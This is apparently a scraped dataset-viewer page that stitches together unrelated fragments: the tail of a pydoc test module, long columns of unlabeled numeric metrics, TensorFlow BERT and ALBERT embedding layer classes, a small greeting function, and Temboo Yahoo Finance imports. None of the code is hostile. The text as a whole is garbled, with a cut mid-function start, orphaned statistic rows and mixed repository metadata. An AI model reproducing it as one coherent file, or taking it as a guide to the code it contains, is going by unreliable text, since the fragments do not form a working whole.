            return inst.desc[self.attr]

    class set_desc:
        def __init__(self, attr):
            self.attr = attr
        def __call__(self, inst, val):
            print('Set called', self, inst, val)
            inst.desc[self.attr] = val

    class del_desc:
        def __init__(self, attr):
            self.attr = attr
        def __call__(self, inst):
            print('Del called', self, inst)
            del inst.desc[self.attr]

    x = property(get_desc('x'), set_desc('x'), del_desc('x'), 'prop x')
# A synthetic nested module object so pydoc's module-summary rendering has
# a submodule to display.
submodule = types.ModuleType(__name__ + '.submodule',
    "A submodule, which should appear in its parent's summary")
| 22.765306
| 71
| 0.560287
| 982
| 6,693
| 3.675153
| 0.105906
| 0.167082
| 0.274314
| 0.407869
| 0.763369
| 0.74813
| 0.73954
| 0.731782
| 0.731782
| 0.731782
| 0
| 0.001483
| 0.294636
| 6,693
| 293
| 72
| 22.843003
| 0.762974
| 0.363215
| 0
| 0.672897
| 0
| 0
| 0.035557
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.71028
| false
| 0
| 0.009346
| 0
| 0.88785
| 0.028037
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
35f08970501297184a8c80c86cd8c0a064aa8a91
| 6,244
|
py
|
Python
|
easytransfer/layers/embedding.py
|
johnson7788/EasyTransfer
|
7e59935ab663fbdb9be56e7e081e59a2154b5489
|
[
"Apache-2.0"
] | 806
|
2020-09-02T03:05:24.000Z
|
2022-03-26T03:45:23.000Z
|
easytransfer/layers/embedding.py
|
johnson7788/EasyTransfer
|
7e59935ab663fbdb9be56e7e081e59a2154b5489
|
[
"Apache-2.0"
] | 48
|
2020-09-16T12:53:32.000Z
|
2022-03-09T09:34:44.000Z
|
easytransfer/layers/embedding.py
|
johnson7788/EasyTransfer
|
7e59935ab663fbdb9be56e7e081e59a2154b5489
|
[
"Apache-2.0"
] | 151
|
2020-09-16T12:31:06.000Z
|
2022-03-24T08:51:47.000Z
|
# coding=utf-8
# Copyright (c) 2019 Alibaba PAI team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from tensorflow.python.layers.base import Layer
from .core import LayerNormalization, Dropout
from .utils import get_initializer, get_shape_list
class BertEmbeddings(Layer):
    """Construct the embeddings from word, position and token_type embeddings.
    """

    def __init__(self, config, **kwargs):
        super(BertEmbeddings, self).__init__(**kwargs)
        # Sizes and hyper-parameters are all read from the model config object.
        self.vocab_size = config.vocab_size
        self.hidden_size = config.hidden_size
        self.initializer_range = config.initializer_range
        self.token_type_vocab_size = config.type_vocab_size
        self.max_position_embeddings = config.max_position_embeddings
        # NOTE(review): this stores the LayerNormalization *class*, not an
        # instance; it is invoked directly in call() with a name kwarg —
        # presumably relying on TF variable-scope reuse. Confirm before changing.
        self.LayerNorm = LayerNormalization
        self.dropout = Dropout(config.hidden_dropout_prob)
        self.initializer = get_initializer(self.initializer_range)

    def build(self, input_shape):
        """Build shared word embedding layer """
        # Three embedding tables: token ids, absolute positions, segment ids.
        self.word_embeddings = self.add_weight(
            "word_embeddings",
            dtype=tf.float32,
            shape=[self.vocab_size, self.hidden_size],
            initializer=self.initializer,
        )
        self.position_embeddings = self.add_weight(
            "position_embeddings",
            dtype=tf.float32,
            shape=[self.max_position_embeddings, self.hidden_size],
            initializer=self.initializer,
        )
        self.token_type_embeddings = self.add_weight(
            "token_type_embeddings",
            dtype=tf.float32,
            shape=[self.token_type_vocab_size, self.hidden_size],
            initializer=self.initializer,
        )
        super(BertEmbeddings,self).build(input_shape)

    def call(self, inputs, training=False):
        # inputs is a pair: (input_ids, token_type_ids) — both integer id tensors.
        input_ids, token_type_ids = inputs
        input_embeddings = tf.gather(self.word_embeddings, input_ids)
        input_shape = get_shape_list(input_embeddings)
        batch_size = input_shape[0]
        seq_length = input_shape[1]
        width = input_shape[2]
        # This vocab will be small so we always do one-hot here, since it is always
        # faster for a small vocabulary.
        flat_token_type_ids = tf.reshape(token_type_ids, [-1])
        one_hot_ids = tf.one_hot(flat_token_type_ids, depth=self.token_type_vocab_size)
        token_type_embeddings = tf.matmul(one_hot_ids, self.token_type_embeddings)
        token_type_embeddings = tf.reshape(token_type_embeddings,
            [batch_size, seq_length, width])
        input_embeddings += token_type_embeddings
        # Position embeddings for the first seq_length positions, broadcast
        # over the batch dimension via expand_dims.
        position_embeddings = tf.gather(self.position_embeddings, tf.range(0, seq_length))
        position_embeddings = tf.expand_dims(position_embeddings, 0)
        input_embeddings += position_embeddings
        # Layer-norm then dropout, matching the original BERT embedding stack.
        output = self.LayerNorm(input_embeddings, name="LayerNorm")
        output = self.dropout(output, training=training)
        return output
class AlbertEmbeddings(Layer):
    """ALBERT input embedding layer.

    Same scheme as BERT embeddings — word + token-type + position lookups,
    then layer normalization and dropout — except the tables use the
    (typically smaller) factorized ``embedding_size`` instead of
    ``hidden_size``.
    """

    def __init__(self, config, **kwargs):
        super(AlbertEmbeddings, self).__init__(**kwargs)
        # Table sizes come straight from the model config.
        self.vocab_size = config.vocab_size
        self.embedding_size = config.embedding_size
        self.initializer_range = config.initializer_range
        self.token_type_vocab_size = config.type_vocab_size
        self.max_position_embeddings = config.max_position_embeddings
        self.LayerNorm = LayerNormalization
        self.dropout = Dropout(config.hidden_dropout_prob)
        self.initializer = get_initializer(self.initializer_range)

    def build(self, input_shape):
        """Create the word, position and token-type embedding tables."""
        # Creation order (word, position, token_type) and weight names are
        # preserved so checkpoints keep matching.
        for weight_name, num_rows in (
            ("word_embeddings", self.vocab_size),
            ("position_embeddings", self.max_position_embeddings),
            ("token_type_embeddings", self.token_type_vocab_size),
        ):
            setattr(
                self,
                weight_name,
                self.add_weight(
                    weight_name,
                    dtype=tf.float32,
                    shape=[num_rows, self.embedding_size],
                    initializer=self.initializer,
                ),
            )
        super(AlbertEmbeddings, self).build(input_shape)

    def call(self, inputs, training=False):
        """Combine word, token-type and position embeddings.

        Args:
            inputs: pair ``(input_ids, token_type_ids)`` of integer id
                tensors; assumed shape [batch_size, seq_length] — TODO confirm
                against callers.
            training: whether dropout is active.

        Returns:
            A float tensor of shape [batch_size, seq_length, embedding_size].
        """
        input_ids, token_type_ids = inputs
        embeddings = tf.gather(self.word_embeddings, input_ids)
        batch_size, seq_length, width = get_shape_list(embeddings)
        # The token-type vocab is tiny, so a one-hot matmul is used instead
        # of a gather (faster for very small vocabularies).
        flat_segment_ids = tf.reshape(token_type_ids, [-1])
        one_hot_segments = tf.one_hot(
            flat_segment_ids, depth=self.token_type_vocab_size)
        segment_embeddings = tf.reshape(
            tf.matmul(one_hot_segments, self.token_type_embeddings),
            [batch_size, seq_length, width])
        embeddings = embeddings + segment_embeddings
        # Take the first seq_length rows of the position table and broadcast
        # over the batch dimension.
        position_embeddings = tf.expand_dims(
            tf.gather(self.position_embeddings, tf.range(0, seq_length)), 0)
        embeddings = embeddings + position_embeddings
        # NOTE(review): self.LayerNorm is the LayerNormalization symbol from
        # .core, invoked directly on the tensor here — presumably .core
        # defines it as a callable returning the normalized tensor; confirm.
        normalized = self.LayerNorm(embeddings, name="LayerNorm")
        return self.dropout(normalized, training=training)
| 39.518987
| 90
| 0.682735
| 753
| 6,244
| 5.383798
| 0.196547
| 0.066601
| 0.074988
| 0.02664
| 0.821904
| 0.813764
| 0.813764
| 0.810064
| 0.787864
| 0.787864
| 0
| 0.006926
| 0.236867
| 6,244
| 158
| 91
| 39.518987
| 0.843861
| 0.161115
| 0
| 0.769231
| 0
| 0
| 0.024611
| 0.008075
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.038462
| 0
| 0.134615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c40504e00e662f527f38ab77e8d3532a6e724a49
| 52
|
py
|
Python
|
helper.py
|
cms3my/cs3240-labdemo
|
7912ff32d3cb110bbad3dcf321860f10be5ce6c0
|
[
"MIT"
] | null | null | null |
helper.py
|
cms3my/cs3240-labdemo
|
7912ff32d3cb110bbad3dcf321860f10be5ce6c0
|
[
"MIT"
] | null | null | null |
helper.py
|
cms3my/cs3240-labdemo
|
7912ff32d3cb110bbad3dcf321860f10be5ce6c0
|
[
"MIT"
] | null | null | null |
def greeting(msg):
    """Print *msg* twice, one line per print call."""
    for _ in range(2):
        # print() applies str() itself, so the explicit str(msg) of the
        # original is unnecessary; output is identical.
        print(msg)
| 17.333333
| 18
| 0.692308
| 9
| 52
| 4
| 0.555556
| 0.444444
| 0.611111
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 52
| 3
| 19
| 17.333333
| 0.765957
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c44ab29ba69334b0e31a13c66d028826bea47c66
| 274
|
py
|
Python
|
temboo/core/Library/Yahoo/Finance/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Yahoo/Finance/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Yahoo/Finance/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Yahoo.Finance.GetNews import GetNews, GetNewsInputSet, GetNewsResultSet, GetNewsChoreographyExecution
from temboo.Library.Yahoo.Finance.GetStockQuote import GetStockQuote, GetStockQuoteInputSet, GetStockQuoteResultSet, GetStockQuoteChoreographyExecution
| 91.333333
| 151
| 0.89781
| 22
| 274
| 11.181818
| 0.636364
| 0.081301
| 0.138211
| 0.178862
| 0.235772
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051095
| 274
| 2
| 152
| 137
| 0.946154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.